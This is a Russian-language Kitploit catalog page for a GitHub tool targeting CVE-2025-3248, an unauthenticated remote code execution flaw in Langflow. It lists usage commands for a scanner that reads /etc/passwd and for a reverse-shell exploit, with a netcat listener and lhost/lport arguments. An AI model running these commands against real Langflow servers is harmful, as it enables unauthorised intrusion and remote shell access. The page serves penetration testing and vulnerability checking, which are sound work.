Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3248 | Kitploit
Инструменты/GitHubGitHub/r0otk3r/cve-2025-3248
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubr0otk3r/cve-2025-3248

CVE-2025-3248

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3248: Неаутентифицированное удалённое выполнение кода (RCE) в Langflow

Этот репозиторий содержит два Python-скрипта:

  • LangflowCheck.py: Сканер, который проверяет экземпляры Langflow AI на уязвимость к CVE-2025-3248.
  • exploit.py: Рабочий эксплойт reverse shell для уязвимых целей Langflow.

Краткое описание

CVE-2025-3248 — критическая уязвимость в Langflow AI, которая позволяет неаутентифицированным атакующим удалённо выполнять произвольный Python-код с помощью специально сформированной полезной нагрузки, отправляемой на /api/v1/validate/code.


Файлы

LangflowCheck.py

  • Проверяет, уязвима ли цель, пытаясь выполнить безвредную полезную нагрузку, которая читает /etc/passwd.
  • Может сканировать одну цель или список URL-адресов.
  • Поддерживает сохранение уязвимых целей в файл.

exploit.py

  • Отправляет полезную нагрузку reverse shell на уязвимую конечную точку.
  • Требует IP-адрес атакующего (lhost) и порт прослушивания (lport).
  • Записывает активность в журнал exploit.log.
  • Поддерживает проверку слушателя перед отправкой полезной нагрузки.

Использование

1. Установка зависимостей

root@kitploit:~
pip install -r requirements.txt

2. Запуск сканера уязвимостей

Одиночный URL

root@kitploit:~
python3 LangflowCheck.py --url http://target.com --output vulnerable_target.txt

1

Несколько целей

root@kitploit:~
python3 LangflowCheck.py --file targets.txt --output vulnerable_targets.txt

tt

3. Эксплуатация цели

Сначала запустите слушатель

root@kitploit:~
sudo nc -nvlp 4444

l

Затем запустите эксплойт:

root@kitploit:~
python3 exploit.py --target http://target.com --lhost YOUR_IP --lport 4444

2

Если цель уязвима, вы должны получить shell. root

⚠️ Отказ от ответственности

Этот эксплойт предназначен только для образовательного и авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.


Официальные каналы

  • YouTube @rootctf
  • X @r0otk3r
Скачать инструмент